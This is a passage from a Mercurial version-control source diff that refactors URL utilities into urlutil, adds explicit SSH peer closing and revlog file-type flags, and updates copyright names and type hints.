_cleanuppipes(ui, pipei, pipeo, pipee, warn): """Clean up pipes used by an SSH connection.""" - if pipeo: + didsomething = False + if pipeo and not pipeo.closed: + didsomething = True pipeo.close() - if pipei: + if pipei and not pipei.closed: + didsomething = True pipei.close() - if pipee: + if pipee and not pipee.closed: + didsomething = True # Try to read from the err descriptor until EOF. try: for l in pipee: @@ -161,6 +170,14 @@ pipee.close() + if didsomething and warn is not None: + # Encourage explicit close of sshpeers. Closing via __del__ is + # not very predictable when exceptions are thrown, which has led + # to deadlocks due to a peer get gc'ed in a fork + # We add our own stack trace, because the stacktrace when called + # from __del__ is useless. + ui.develwarn(b'missing close on SSH connection created at:\n%s' % warn) + def _makeconnection(ui, sshcmd, args, remotecmd, path, sshenv=None): """Create an SSH connection to a server. @@ -412,6 +429,7 @@ self._pipee = stderr self._caps = caps self._autoreadstderr = autoreadstderr + self._initstack = b''.join(util.getstackframes(1)) # Commands that have a "framed" response where the first line of the # response contains the length of that response. @@ -434,7 +452,7 @@ return True def close(self): - pass + self._cleanup() # End of ipeerconnection interface. @@ -452,10 +470,11 @@ self._cleanup() raise exception - def _cleanup(self): - _cleanuppipes(self.ui, self._pipei, self._pipeo, self._pipee) + def _cleanup(self, warn=None): + _cleanuppipes(self.ui, self._pipei, self._pipeo, self._pipee, warn=warn) - __del__ = _cleanup + def __del__(self): + self._cleanup(warn=self._initstack) def _sendrequest(self, cmd, args, framed=False): if self.ui.debugflag and self.ui.configbool( @@ -607,7 +626,7 @@ try: protoname, caps = _performhandshake(ui, stdin, stdout, stderr) except Exception: - _cleanuppipes(ui, stdout, stdin, stderr) + _cleanuppipes(ui, stdout, stdin, stderr, warn=None) raise if protoname == wireprototypes.SSHV1: @@ -633,7 +652,7 @@ autoreadstderr=autoreadstderr, ) else: - _cleanuppipes(ui, stdout, stdin, stderr) + _cleanuppipes(ui, stdout, stdin, stderr, warn=None) raise error.RepoError( _(b'unknown version of SSH protocol: %s') % protoname ) @@ -644,11 +663,11 @@ The returned object conforms to the ``wireprotov1peer.wirepeer`` interface. """ - u = util.url(path, parsequery=False, parsefragment=False) + u = urlutil.url(path, parsequery=False, parsefragment=False) if u.scheme != b'ssh' or not u.host or u.path is None: raise error.RepoError(_(b"couldn't parse location %s") % path) - util.checksafessh(path) + urlutil.checksafessh(path) if u.passwd is not None: raise error.RepoError(_(b'password in URL not supported')) diff --git a/mercurial/sslutil.py b/mercurial/sslutil.py --- a/mercurial/sslutil.py +++ b/mercurial/sslutil.py @@ -1,6 +1,6 @@ # sslutil.py - SSL handling for mercurial # -# Copyright 2005, 2006, 2007, 2008 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006, 2007, 2008 Olivia Mackall <olivia@selenic.com> # Copyright 2006, 2007 Alexis S. L. Carvalho <alexis@cecm.usp.br> # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com> # diff --git a/mercurial/stack.py b/mercurial/stack.py --- a/mercurial/stack.py +++ b/mercurial/stack.py @@ -1,6 +1,6 @@ # stack.py - Mercurial functions for stack definition # -# Copyright Matt Mackall <mpm@selenic.com> and other +# Copyright Olivia Mackall <olivia@selenic.com> and other # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/statichttprepo.py b/mercurial/statichttprepo.py --- a/mercurial/statichttprepo.py +++ b/mercurial/statichttprepo.py @@ -2,7 +2,7 @@ # # This provides read-only repo access to repositories exported via static http # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -12,6 +12,7 @@ import errno from .i18n import _ +from .node import sha1nodeconstants from . import ( branchmap, changelog, @@ -25,6 +26,9 @@ util, vfs as vfsmod, ) +from .utils import ( + urlutil, +) urlerr = util.urlerr urlreq = util.urlreq @@ -161,7 +165,7 @@ self.ui = ui self.root = path - u = util.url(path.rstrip(b'/') + b"/.hg") + u = urlutil.url(path.rstrip(b'/') + b"/.hg") self.path, authinfo = u.authinfo() vfsclass = build_opener(ui, authinfo) @@ -172,6 +176,7 @@ self.names = namespaces.namespaces() self.filtername = None self._extrafilterid = None + self._wanted_sidedata = set() try: requirements = set(self.vfs.read(b'requires').splitlines()) @@ -197,6 +202,8 @@ requirements, supportedrequirements ) localrepo.ensurerequirementscompatible(ui, requirements) + self.nodeconstants = sha1nodeconstants + self.nullid = self.nodeconstants.nullid # setup store self.store = localrepo.makestore(requirements, self.path, vfsclass) @@ -206,7 +213,7 @@ self._filecache = {} self.requirements = requirements - rootmanifest = manifest.manifestrevlog(self.svfs) + rootmanifest = manifest.manifestrevlog(self.nodeconstants, self.svfs) self.manifestlog = manifest.manifestlog( self.svfs, self, rootmanifest, self.narrowmatch() ) diff --git a/mercurial/store.py b/mercurial/store.py --- a/mercurial/store.py +++ b/mercurial/store.py @@ -1,6 +1,6 @@ # store.py - repository store handling for Mercurial # -# Copyright 2008 Matt Mackall <mpm@selenic.com> +# Copyright 2008 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -10,6 +10,7 @@ import errno import functools import os +import re import stat from .i18n import _ @@ -387,13 +388,58 @@ b'requires', ] +REVLOG_FILES_MAIN_EXT = (b'.i', b'i.tmpcensored') +REVLOG_FILES_OTHER_EXT = (b'.d', b'.n', b'.nd', b'd.tmpcensored') +# files that are "volatile" and might change between listing and streaming +# +# note: the ".nd" file are nodemap data and won't "change" but they might be +# deleted. +REVLOG_FILES_VOLATILE_EXT = (b'.n', b'.nd') -def isrevlog(f, kind, st): +# some exception to the above matching +EXCLUDED = re.compile(b'.*undo\.[^/]+\.nd?$') + + +def is_revlog(f, kind, st): if kind != stat.S_IFREG: - return False - if f[-2:] in (b'.i', b'.d', b'.n'): - return True - return f[-3:] == b'.nd' + return None + return revlog_type(f) + + +def revlog_type(f): + if f.endswith(REVLOG_FILES_MAIN_EXT): + return FILEFLAGS_REVLOG_MAIN + elif f.endswith(REVLOG_FILES_OTHER_EXT) and EXCLUDED.match(f) is None: + t = FILETYPE_FILELOG_OTHER + if f.endswith(REVLOG_FILES_VOLATILE_EXT): + t |= FILEFLAGS_VOLATILE + return t + + +# the file is part of changelog data +FILEFLAGS_CHANGELOG = 1 << 13 +# the file is part of manifest data +FILEFLAGS_MANIFESTLOG = 1 << 12 +# the file is part of filelog data +FILEFLAGS_FILELOG = 1 << 11 +# file that are not directly part of a revlog +FILEFLAGS_OTHER = 1 << 10 + +# the main entry point for a revlog +FILEFLAGS_REVLOG_MAIN = 1 << 1 +# a secondary file for a revlog +FILEFLAGS_REVLOG_OTHER = 1 << 0 + +# files that are "volatile" and might change between listing and streaming +FILEFLAGS_VOLATILE = 1 << 20 + +FILETYPE_CHANGELOG_MAIN = FILEFLAGS_CHANGELOG | FILEFLAGS_REVLOG_MAIN +FILETYPE_CHANGELOG_OTHER = FILEFLAGS_CHANGELOG | FILEFLAGS_REVLOG_OTHER +FILETYPE_MANIFESTLOG_MAIN = FILEFLAGS_MANIFESTLOG | FILEFLAGS_REVLOG_MAIN +FILETYPE_MANIFESTLOG_OTHER = FILEFLAGS_MANIFESTLOG | FILEFLAGS_REVLOG_OTHER +FILETYPE_FILELOG_MAIN = FILEFLAGS_FILELOG | FILEFLAGS_REVLOG_MAIN +FILETYPE_FILELOG_OTHER = FILEFLAGS_FILELOG | FILEFLAGS_REVLOG_OTHER +FILETYPE_OTHER = FILEFLAGS_OTHER class basicstore(object): @@ -411,7 +457,7 @@ def join(self, f): return self.path + b'/' + encodedir(f) - def _walk(self, relpath, recurse, filefilter=isrevlog): + def _walk(self, relpath, recurse): '''yields (unencoded, encoded, size)''' path = self.path if relpath: @@ -425,30 +471,46 @@ p = visit.pop() for f, kind, st in readdir(p, stat=True): fp = p + b'/' + f - if filefilter(f, kind, st): + rl_type = is_revlog(f, kind, st) + if rl_type is not None: n = util.pconvert(fp[striplen:]) - l.append((decodedir(n), n, st.st_size)) + l.append((rl_type, decodedir(n), n, st.st_size)) elif kind == stat.S_IFDIR and recurse: visit.append(fp) l.sort() return l - def changelog(self, trypending): - return changelog.changelog(self.vfs, trypending=trypending) + def changelog(self, trypending, concurrencychecker=None): + return changelog.changelog( + self.vfs, + trypending=trypending, + concurrencychecker=concurrencychecker, + ) def manifestlog(self, repo, storenarrowmatch): - rootstore = manifest.manifestrevlog(self.vfs) + rootstore = manifest.manifestrevlog(repo.nodeconstants, self.vfs) return manifest.manifestlog(self.vfs, repo, rootstore, storenarrowmatch) def datafiles(self, matcher=None): - return self._walk(b'data', True) + self._walk(b'meta', True) + files = self._walk(b'data', True) + self._walk(b'meta', True) + for (t, u, e, s) in files: + yield (FILEFLAGS_FILELOG | t, u, e, s) def topfiles(self): # yield manifest before changelog - return reversed(self._walk(b'', False)) + files = reversed(self._walk(b'', False)) + for (t, u, e, s) in files: + if u.startswith(b'00changelog'): + yield (FILEFLAGS_CHANGELOG | t, u, e, s) + elif u.startswith(b'00manifest'): + yield (FILEFLAGS_MANIFESTLOG | t, u, e, s) + else: + yield (FILETYPE_OTHER | t, u, e, s) def walk(self, matcher=None): - """yields (unencoded, encoded, size) + """return file related to data storage (ie: revlogs) + + yields (file_type, unencoded, encoded, size) if a matcher is passed, storage files of only those tracked paths are passed with matches the matcher @@ -494,14 +556,14 @@ self.opener = self.vfs def datafiles(self, matcher=None): - for a, b, size in super(encodedstore, self).datafiles(): + for t, a, b, size in super(encodedstore, self).datafiles(): try: a = decodefilename(a) except KeyError: a = None if a is not None and not _matchtrackedpath(a, matcher): continue - yield a, b, size + yield t, a, b, size def join(self, f): return self.path + b'/' + encodefilename(f) @@ -690,7 +752,9 @@ continue ef = self.encode(f) try: - yield f, ef, self.getsize(ef) + t = revlog_type(f) + t |= FILEFLAGS_FILELOG + yield t, f, ef, self.getsize(ef) except OSError as err: if err.errno != errno.ENOENT: raise diff --git a/mercurial/streamclone.py b/mercurial/streamclone.py --- a/mercurial/streamclone.py +++ b/mercurial/streamclone.py @@ -20,6 +20,7 @@ narrowspec, phases, pycompat, + requirements as requirementsmod, scmutil, store, util, @@ -83,7 +84,7 @@ # is advertised and contains a comma-delimited list of requirements. requirements = set() if remote.capable(b'stream'): - requirements.add(b'revlogv1') + requirements.add(requirementsmod.REVLOGV1_REQUIREMENT) else: streamreqs = remote.capable(b'streamreqs') # This is weird and shouldn't happen with modern servers. @@ -242,10 +243,12 @@ # Get consistent snapshot of repo, lock during scan. with repo.lock(): repo.ui.debug(b'scanning\n') - for name, ename, size in _walkstreamfiles(repo): + for file_type, name, ename, size in _walkstreamfiles(repo): if size: entries.append((name, size)) total_bytes += size + _test_sync_point_walk_1(repo) + _test_sync_point_walk_2(repo) repo.ui.debug( b'%d files, %d bytes to transfer\n' % (len(entries), total_bytes) @@ -592,6 +595,14 @@ fp.close() +def _test_sync_point_walk_1(repo): + """a function for synchronisation during tests""" + + +def _test_sync_point_walk_2(repo): + """a function for synchronisation during tests""" + + def generatev2(repo, includes, excludes, includeobsmarkers): """Emit content for version 2 of a streaming clone. @@ -615,9 +626,12 @@ matcher = narrowspec.match(repo.root, includes, excludes) repo.ui.debug(b'scanning\n') - for name, ename, size in _walkstreamfiles(repo, matcher): + for rl_type, name, ename, size in _walkstreamfiles(repo, matcher): if size: - entries.append((_srcstore, name, _fileappend, size)) + ft = _fileappend + if rl_type & store.FILEFLAGS_VOLATILE: + ft = _filefull + entries.append((_srcstore, name, ft, size)) totalfilesize += size for name in _walkstreamfullstorefiles(repo): if repo.svfs.exists(name): @@ -634,6 +648,8 @@ chunks = _emit2(repo, entries, totalfilesize) first = next(chunks) assert first is None + _test_sync_point_walk_1(repo) + _test_sync_point_walk_2(repo) return len(entries), totalfilesize, chunks diff --git a/mercurial/subrepo.py b/mercurial/subrepo.py --- a/mercurial/subrepo.py +++ b/mercurial/subrepo.py @@ -1,6 +1,6 @@ # subrepo.py - sub-repository classes and factory # -# Copyright 2009-2010 Matt Mackall <mpm@selenic.com> +# Copyright 2009-2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -44,6 +44,7 @@ dateutil, hashutil, procutil, + urlutil, ) hg = None @@ -57,8 +58,8 @@ """ get a path or url and if it is a path expand it and return an absolute path """ - expandedpath = util.urllocalpath(util.expandpath(path)) - u = util.url(expandedpath) + expandedpath = urlutil.urllocalpath(util.expandpath(path)) + u = urlutil.url(expandedpath) if not u.scheme: path = util.normpath(os.path.abspath(u.path)) return path @@ -716,13 +717,17 @@ _(b'sharing subrepo %s from %s\n') % (subrelpath(self), srcurl) ) - shared = hg.share( - self._repo._subparent.baseui, - getpeer(), - self._repo.root, - update=False, - bookmarks=False, - ) + peer = getpeer() + try: + shared = hg.share( + self._repo._subparent.baseui, + peer, + self._repo.root, + update=False, + bookmarks=False, + ) + finally: + peer.close() self._repo = shared.local() else: # TODO: find a common place for this and this code in the @@ -741,26 +746,34 @@ self.ui.status( _(b'cloning subrepo %s from %s\n') - % (subrelpath(self), util.hidepassword(srcurl)) + % (subrelpath(self), urlutil.hidepassword(srcurl)) ) - other, cloned = hg.clone( - self._repo._subparent.baseui, - {}, - getpeer(), - self._repo.root, - update=False, - shareopts=shareopts, - ) + peer = getpeer() + try: + other, cloned = hg.clone( + self._repo._subparent.baseui, + {}, + peer, + self._repo.root, + update=False, + shareopts=shareopts, + ) + finally: + peer.close() self._repo = cloned.local() self._initrepo(parentrepo, source, create=True) self._cachestorehash(srcurl) else: self.ui.status( _(b'pulling subrepo %s from %s\n') - % (subrelpath(self), util.hidepassword(srcurl)) + % (subrelpath(self), urlutil.hidepassword(srcurl)) ) cleansub = self.storeclean(srcurl) - exchange.pull(self._repo, getpeer()) + peer = getpeer() + try: + exchange.pull(self._repo, peer) + finally: + peer.close() if cleansub: # keep the repo clean after pull self._cachestorehash(srcurl) @@ -837,15 +850,18 @@ if self.storeclean(dsturl): self.ui.status( _(b'no changes made to subrepo %s since last push to %s\n') - % (subrelpath(self), util.hidepassword(dsturl)) + % (subrelpath(self), urlutil.hidepassword(dsturl)) ) return None self.ui.status( _(b'pushing subrepo %s to %s\n') - % (subrelpath(self), util.hidepassword(dsturl)) + % (subrelpath(self), urlutil.hidepassword(dsturl)) ) other = hg.peer(self._repo, {b'ssh': ssh}, dsturl) - res = exchange.push(self._repo, other, force, newbranch=newbranch) + try: + res = exchange.push(self._repo, other, force, newbranch=newbranch) + finally: + other.close() # the repo is now clean self._cachestorehash(dsturl) @@ -857,7 +873,8 @@ opts = copy.copy(opts) opts.pop(b'rev', None) opts.pop(b'branch', None) - return hg.outgoing(ui, self._repo, _abssource(self._repo, True), opts) + subpath = subrepoutil.repo_rel_or_abs_source(self._repo) + return hg.outgoing(ui, self._repo, dest, opts, subpath=subpath) @annotatesubrepoerror def incoming(self, ui, source, opts): @@ -865,7 +882,8 @@ opts = copy.copy(opts) opts.pop(b'rev', None) opts.pop(b'branch', None) - return hg.incoming(ui, self._repo, _abssource(self._repo, False), opts) + subpath = subrepoutil.repo_rel_or_abs_source(self._repo) + return hg.incoming(ui, self._repo, source, opts, subpath=subpath) @annotatesubrepoerror def files(self): @@ -1269,7 +1287,7 @@ args.append(b'%s@%s' % (state[0], state[1])) # SEC: check that the ssh url is safe - util.checksafessh(state[0]) + urlutil.checksafessh(state[0]) status, err = self._svncommand(args, failok=True) _sanitize(self.ui, self.wvfs, b'.svn') @@ -1567,7 +1585,7 @@ def _fetch(self, source, revision): if self._gitmissing(): # SEC: check for safe ssh url - util.checksafessh(source) + urlutil.checksafessh(source) source = self._abssource(source) self.ui.status( diff --git a/mercurial/subrepoutil.py b/mercurial/subrepoutil.py --- a/mercurial/subrepoutil.py +++ b/mercurial/subrepoutil.py @@ -1,6 +1,6 @@ # subrepoutil.py - sub-repository operations and substate handling # -# Copyright 2009-2010 Matt Mackall <mpm@selenic.com> +# Copyright 2009-2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -23,12 +23,36 @@ pycompat, util, ) -from .utils import stringutil +from .utils import ( + stringutil, + urlutil, +) nullstate = (b'', b'', b'empty') +if pycompat.TYPE_CHECKING: + from typing import ( + Any, + Dict, + List, + Optional, + Set, + Tuple, + ) + from . import ( + context, + localrepo, + match as matchmod, + scmutil, + subrepo, + ui as uimod, + ) + + Substate = Dict[bytes, Tuple[bytes, bytes, bytes]] + def state(ctx, ui): + # type: (context.changectx, uimod.ui) -> Substate """return a state dict, mapping subrepo paths configured in .hgsub to tuple: (source from .hgsub, revision from .hgsubstate, kind (key in types dict)) @@ -84,6 +108,7 @@ raise def remap(src): + # type: (bytes) -> bytes for pattern, repl in p.items(b'subpaths'): # Turn r'C:\foo\bar' into r'C:\\foo\\bar' since re.sub # does a string decode. @@ -105,7 +130,7 @@ return src state = {} - for path, src in p[b''].items(): + for path, src in p.items(b''): # type: bytes kind = b'hg' if src.startswith(b'['): if b']' not in src: @@ -114,10 +139,10 @@ kind = kind[1:] src = src.lstrip() # strip any extra whitespace after ']' - if not util.url(src).isabs(): + if not urlutil.url(src).isabs(): parent = _abssource(repo, abort=False) if parent: - parent = util.url(parent) + parent = urlutil.url(parent) parent.path = posixpath.join(parent.path or b'', src) parent.path = posixpath.normpath(parent.path) joined = bytes(parent) @@ -136,6 +161,7 @@ def writestate(repo, state): + # type: (localrepo.localrepository, Substate) -> None """rewrite .hgsubstate in (outer) repo with these subrepo states""" lines = [ b'%s %s\n' % (state[s][1], s) @@ -146,6 +172,8 @@ def submerge(repo, wctx, mctx, actx, overwrite, labels=None): + # type: (localrepo.localrepository, context.workingctx, context.changectx, context.changectx, bool, Optional[Any]) -> Substate + # TODO: type the `labels` arg """delegated from merge.applyupdates: merging of .hgsubstate file in working context, merging context and ancestor context""" if mctx == actx: # backwards? @@ -285,6 +313,7 @@ def precommit(ui, wctx, status, match, force=False): + # type: (uimod.ui, context.workingcommitctx, scmutil.status, matchmod.basematcher, bool) -> Tuple[List[bytes], Set[bytes], Substate] """Calculate .hgsubstate changes that should be applied before committing Returns (subs, commitsubs, newstate) where @@ -354,7 +383,26 @@ return subs, commitsubs, newstate +def repo_rel_or_abs_source(repo): + """return the source of this repo + + Either absolute or relative the outermost repo""" + parent = repo + chunks = [] + while util.safehasattr(parent, b'_subparent'): + source = urlutil.url(parent._subsource) + chunks.append(bytes(source)) + if source.isabs(): + break + parent = parent._subparent + + chunks.reverse() + path = posixpath.join(*chunks) + return posixpath.normpath(path) + + def reporelpath(repo): + # type: (localrepo.localrepository) -> bytes """return path to this (sub)repo as seen from outermost repo""" parent = repo while util.safehasattr(parent, b'_subparent'): @@ -363,21 +411,23 @@ def subrelpath(sub): + # type: (subrepo.abstractsubrepo) -> bytes """return path to this subrepo as seen from outermost repo""" return sub._relpath def _abssource(repo, push=False, abort=True): + # type: (localrepo.localrepository, bool, bool) -> Optional[bytes] """return pull/push path of repo - either based on parent repo .hgsub info or on the top repo config. Abort or return None if no source found.""" if util.safehasattr(repo, b'_subparent'): - source = util.url(repo._subsource) + source = urlutil.url(repo._subsource) if source.isabs(): return bytes(source) source.path = posixpath.normpath(source.path) parent = _abssource(repo._subparent, push, abort=False) if parent: - parent = util.url(util.pconvert(parent)) + parent = urlutil.url(util.pconvert(parent)) parent.path = posixpath.join(parent.path or b'', source.path) parent.path = posixpath.normpath(parent.path) return bytes(parent) @@ -406,7 +456,7 @@ # # D:\>python -c "import os; print os.path.abspath('C:relative')" # C:\some\path\relative - if util.hasdriveletter(path): + if urlutil.hasdriveletter(path): if len(path) == 2 or path[2:3] not in br'\/': path = os.path.abspath(path) return path @@ -416,6 +466,7 @@ def newcommitphase(ui, ctx): + # type: (uimod.ui, context.changectx) -> int commitphase = phases.newcommitphase(ui) substate = getattr(ctx, "substate", None) if not substate: diff --git a/mercurial/tags.py b/mercurial/tags.py --- a/mercurial/tags.py +++ b/mercurial/tags.py @@ -1,6 +1,6 @@ # tags.py - read tag info from local repository # -# Copyright 2009 Matt Mackall <mpm@selenic.com> +# Copyright 2009 Olivia Mackall <olivia@selenic.com> # Copyright 2009 Greg Ward <greg@gerg.ca> # # This software may be used and distributed according to the terms of the @@ -494,11 +494,25 @@ starttime = util.timer() fnodescache = hgtagsfnodescache(repo.unfiltered()) cachefnode = {} + validated_fnodes = set() + unknown_entries = set() for node in nodes: fnode = fnodescache.getfnode(node) + flog = repo.file(b'.hgtags') if fnode != nullid: + if fnode not in validated_fnodes: + if flog.hasnode(fnode): + validated_fnodes.add(fnode) + else: + unknown_entries.add(node) cachefnode[node] = fnode + if unknown_entries: + fixed_nodemap = fnodescache.refresh_invalid_nodes(unknown_entries) + for node, fnode in pycompat.iteritems(fixed_nodemap): + if fnode != nullid: + cachefnode[node] = fnode + fnodescache.write() duration = util.timer() - starttime @@ -733,6 +747,7 @@ if rawlen < wantedlen: if self._dirtyoffset is None: self._dirtyoffset = rawlen + # TODO: zero fill entire record, because it's invalid not missing? self._raw.extend(b'\xff' * (wantedlen - rawlen)) def getfnode(self, node, computemissing=True): @@ -740,7 +755,8 @@ If the value is in the cache, the entry will be validated and returned. Otherwise, the filenode will be computed and returned unless - "computemissing" is False, in which case None will be returned without + "computemissing" is False. In that case, None will be returned if + the entry is missing or False if the entry is invalid without any potentially expensive computation being performed. If an .hgtags does not exist at the specified revision, nullid is @@ -771,8 +787,19 @@ # If we get here, the entry is either missing or invalid. if not computemissing: + if record != _fnodesmissingrec: + return False return None + fnode = self._computefnode(node) + self._writeentry(offset, properprefix, fnode) + return fnode + + def _computefnode(self, node): + """Finds the tag filenode for a node which is missing or invalid + in cache""" + ctx = self._repo[node] + rev = ctx.rev() fnode = None cl = self._repo.changelog p1rev, p2rev = cl._uncheckedparentrevs(rev) @@ -788,7 +815,7 @@ # we cannot rely on readfast because we don't know against what # parent the readfast delta is computed p1fnode = None - if p1fnode is not None: + if p1fnode: mctx = ctx.manifestctx() fnode = mctx.readfast().get(b'.hgtags') if fnode is None: @@ -800,8 +827,6 @@ except error.LookupError: # No .hgtags file on this revision. fnode = nullid - - self._writeentry(offset, properprefix, fnode) return fnode def setfnode(self, node, fnode): @@ -815,6 +840,21 @@ self._writeentry(ctx.rev() * _fnodesrecsize, node[0:4], fnode) + def refresh_invalid_nodes(self, nodes): + """recomputes file nodes for a given set of nodes which has unknown + filenodes for them in the cache + Also updates the in-memory cache with the correct filenode. + Caller needs to take care about calling `.write()` so that updates are + persisted. + Returns a map {node: recomputed fnode} + """ + fixed_nodemap = {} + for node in nodes: + fnode = self._computefnode(node) + fixed_nodemap[node] = fnode + self.setfnode(node, fnode) + return fixed_nodemap + def _writeentry(self, offset, prefix, fnode): # Slices on array instances only accept other array. entry = bytearray(prefix + fnode) diff --git a/mercurial/templatefilters.py b/mercurial/templatefilters.py --- a/mercurial/templatefilters.py +++ b/mercurial/templatefilters.py @@ -1,6 +1,6 @@ # templatefilters.py - common template expansion filters # -# Copyright 2005-2008 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2008 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/templatefuncs.py b/mercurial/templatefuncs.py --- a/mercurial/templatefuncs.py +++ b/mercurial/templatefuncs.py @@ -1,6 +1,6 @@ # templatefuncs.py - common template functions # -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/templatekw.py b/mercurial/templatekw.py --- a/mercurial/templatekw.py +++ b/mercurial/templatekw.py @@ -1,6 +1,6 @@ # templatekw.py - common changeset template keywords # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/templater.py b/mercurial/templater.py --- a/mercurial/templater.py +++ b/mercurial/templater.py @@ -1,6 +1,6 @@ # templater.py - template expansion for output # -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -891,7 +891,7 @@ fp = _open_mapfile(path) cache, tmap, aliases = _readmapfile(fp, path) - for key, val in conf[b'templates'].items(): + for key, val in conf.items(b'templates'): if not val: raise error.ParseError( _(b'missing value'), conf.source(b'templates', key) @@ -904,7 +904,7 @@ cache[key] = unquotestring(val) elif key != b'__base__': tmap[key] = os.path.join(base, val) - aliases.extend(conf[b'templatealias'].items()) + aliases.extend(conf.items(b'templatealias')) return cache, tmap, aliases diff --git a/mercurial/templateutil.py b/mercurial/templateutil.py --- a/mercurial/templateutil.py +++ b/mercurial/templateutil.py @@ -1,6 +1,6 @@ # templateutil.py - utility for template evaluation # -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/testing/__init__.py b/mercurial/testing/__init__.py --- a/mercurial/testing/__init__.py +++ b/mercurial/testing/__init__.py @@ -0,0 +1,35 @@ +from __future__ import ( + absolute_import, + division, +) + +import os +import time + + +# work around check-code complains +# +# This is a simple log level module doing simple test related work, we can't +# import more things, and we do not need it. +environ = getattr(os, 'environ') + + +def _timeout_factor(): + """return the current modification to timeout""" + default = int(environ.get('HGTEST_TIMEOUT_DEFAULT', 1)) + current = int(environ.get('HGTEST_TIMEOUT', default)) + return current / float(default) + + +def wait_file(path, timeout=10): + timeout *= _timeout_factor() + start = time.time() + while not os.path.exists(path): + if time.time() - start > timeout: + raise RuntimeError(b"timed out waiting for file: %s" % path) + time.sleep(0.01) + + +def write_file(path, content=b''): + with open(path, 'wb') as f: + f.write(content) diff --git a/mercurial/testing/storage.py b/mercurial/testing/storage.py --- a/mercurial/testing/storage.py +++ b/mercurial/testing/storage.py @@ -1129,12 +1129,13 @@ with self._maketransactionfn() as tr: nodes = [] - def onchangeset(cl, node): + def onchangeset(cl, rev): + node = cl.node(rev) nodes.append(node) cb(cl, node) - def ondupchangeset(cl, node): - nodes.append(node) + def ondupchangeset(cl, rev): + nodes.append(cl.node(rev)) f.addgroup( [], @@ -1157,18 +1158,19 @@ f = self._makefilefn() deltas = [ - (node0, nullid, nullid, nullid, nullid, delta0, 0), + (node0, nullid, nullid, nullid, nullid, delta0, 0, {}), ] with self._maketransactionfn() as tr: nodes = [] - def onchangeset(cl, node): + def onchangeset(cl, rev): + node = cl.node(rev) nodes.append(node) cb(cl, node) - def ondupchangeset(cl, node): - nodes.append(node) + def ondupchangeset(cl, rev): + nodes.append(cl.node(rev)) f.addgroup( deltas, @@ -1212,13 +1214,15 @@ for i, fulltext in enumerate(fulltexts): delta = mdiff.trivialdiffheader(len(fulltext)) + fulltext - deltas.append((nodes[i], nullid, nullid, nullid, nullid, delta, 0)) + deltas.append( + (nodes[i], nullid, nullid, nullid, nullid, delta, 0, {}) + ) with self._maketransactionfn() as tr: newnodes = [] - def onchangeset(cl, node): - newnodes.append(node) + def onchangeset(cl, rev): + newnodes.append(cl.node(rev)) f.addgroup( deltas, @@ -1260,7 +1264,9 @@ ) delta = mdiff.textdiff(b'bar\n' * 30, (b'bar\n' * 30) + b'baz\n') - deltas = [(b'\xcc' * 20, node1, nullid, b'\x01' * 20, node1, delta, 0)] + deltas = [ + (b'\xcc' * 20, node1, nullid, b'\x01' * 20, node1, delta, 0, {}) + ] with self._maketransactionfn() as tr: with self.assertRaises(error.CensoredBaseError): diff --git a/mercurial/transaction.py b/mercurial/transaction.py --- a/mercurial/transaction.py +++ b/mercurial/transaction.py @@ -6,7 +6,7 @@ # effectively log-structured, this should amount to simply truncating # anything that isn't referenced in the changelog. # -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/treediscovery.py b/mercurial/treediscovery.py --- a/mercurial/treediscovery.py +++ b/mercurial/treediscovery.py @@ -1,6 +1,6 @@ # discovery.py - protocol changeset discovery functions # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/ui.py b/mercurial/ui.py --- a/mercurial/ui.py +++ b/mercurial/ui.py @@ -1,6 +1,6 @@ # ui.py - user interface bits for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -26,7 +26,6 @@ from .pycompat import ( getattr, open, - setattr, ) from . import ( @@ -48,6 +47,7 @@ procutil, resourceutil, stringutil, + urlutil, ) urlreq = util.urlreq @@ -302,6 +302,11 @@ if k in self.environ: self._exportableenviron[k] = self.environ[k] + def _new_source(self): + self._ocfg.new_source() + self._tcfg.new_source() + self._ucfg.new_source() + @classmethod def load(cls): """Create a ui and load global and user configs""" @@ -313,6 +318,7 @@ elif t == b'resource': u.read_resource_config(f, trust=True) elif t == b'items': + u._new_source() sections = set() for section, name, value, source in f: # do not set u._ocfg @@ -325,6 +331,7 @@ else: raise error.ProgrammingError(b'unknown rctype: %s' % t) u._maybetweakdefaults() + u._new_source() # anything after that is a different level return u def _maybetweakdefaults(self): @@ -552,9 +559,9 @@ ) p = 